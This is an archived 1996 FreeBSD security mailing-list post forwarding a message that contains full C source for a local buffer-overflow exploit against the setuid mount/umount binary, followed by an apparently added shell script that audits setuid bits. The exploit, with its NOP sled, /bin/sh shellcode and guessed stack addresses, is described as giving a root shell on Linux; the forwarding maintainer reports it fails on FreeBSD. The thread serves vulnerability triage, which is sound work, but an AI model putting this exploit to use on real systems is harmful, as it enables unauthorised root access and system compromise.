Date: Fri, 23 Aug 1996 11:11:23 -0700
From: Julian Elischer <julian@whistle.com>
To: security@freebsd.org
Subject: [Fwd: mount bug..]
Message-ID: <321DF44B.6201DD56@whistle.com>
This doesn't work, but I'm wondering why it says it's for FreeBSD.. did it work on an earlier version? (even with bin replaced by sbin) umount is not suid anyhow, but..... does anyone know about this?

julian

---------- Forwarded message ----------
From: Adrian Chadd <adrian@wisdom.psinet.net.au>
Message-Id: <199608230152.JAA16860@wisdom.psinet.net.au>
Subject: mount bug..
To: digger@omen.com.au, julian@whistle.com
Date: Fri, 23 Aug 1996 09:52:16 +0800 (WST)

Here is the source to try out on your system:

/* Mount Exploit for Linux/FreeBSD, Jul 30 1996
   Discovered and Coded by Bloodmask & Vio Covin 1996 */

#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>     /* memset, strlen */
#include <fcntl.h>
#include <sys/types.h>  /* u_long, u_char, u_int */
#include <sys/stat.h>

#define PATH_MOUNT "/bin/umount"
#define BUFFER_SIZE 1024
#define DEFAULT_OFFSET 50

u_long get_esp()
{
    __asm__("movl %esp, %eax");
}

main(int argc, char **argv)
{
    u_char execshell[] =
        "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
        "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
        "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";
    char *buff = NULL;
    unsigned long *addr_ptr = NULL;
    char *ptr = NULL;
    int i;
    int ofs = DEFAULT_OFFSET;

    buff = malloc(4096);
    if(!buff)
    {
        printf("can't allocate memory\n");
        exit(0);
    }
    ptr = buff;

    /* fill start of buffer with nops */
    memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
    ptr += BUFFER_SIZE-strlen(execshell);

    /* stick asm code into the buffer */
    for(i=0;i < strlen(execshell);i++)
        *(ptr++) = execshell[i];

    /* follow the code with two copies of the guessed stack address */
    addr_ptr = (long *)ptr;
    for(i=0;i < (8/4);i++)
        *(addr_ptr++) = get_esp() + ofs;
    ptr = (char *)addr_ptr;
    *ptr = 0;

    (void)alarm((u_int)0);
    printf("Discovered and Coded by Bloodmask and Vio, Covin 1996\n");
    execl(PATH_MOUNT, "mount", buff, NULL);
}

Basically it gives you a root shell.. might want to take a look at it. It works in Linux.. I don't have a FreeBSD system to try it out on at the moment however.

Adrian Chadd <adrian@psinet.net.au>
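Julian's point that umount is not setuid is the precondition that decides whether an argv overflow in it matters at all. The POSIX sh check below is an added example, not part of either message: it classifies the setuid state of a binary, and the function names and the /bin and /sbin paths it inspects are my assumptions taken from the locations the thread mentions.

```sh
#!/bin/sh
# Added example, not from the original thread: report a binary's setuid
# state. Uses only POSIX find(1), so it behaves the same on Linux and BSD.

# Print one of: missing, setuid-root, setuid, clear
classify() {
    path=$1
    [ -e "$path" ] || { echo missing; return 0; }
    # -prune keeps find from descending if the path is a directory;
    # -perm -4000 matches when the setuid bit is set, whatever the other bits.
    if find "$path" -prune -perm -4000 -user root -print 2>/dev/null | grep -q .; then
        echo setuid-root      # an overflow here would run code as root
    elif find "$path" -prune -perm -4000 -print 2>/dev/null | grep -q .; then
        echo setuid           # privileged, but not as root
    else
        echo clear            # an overflow only affects the caller's own uid
    fi
}

# Inspect the bin and sbin variants discussed in the thread. The path list
# is an assumption; extend it for your own system.
audit_mount_binaries() {
    for p in /bin/mount /bin/umount /sbin/mount /sbin/umount; do
        printf '%s\t%s\n' "$p" "$(classify "$p")"
    done
}

audit_mount_binaries
```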
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?321DF44B.6201DD56>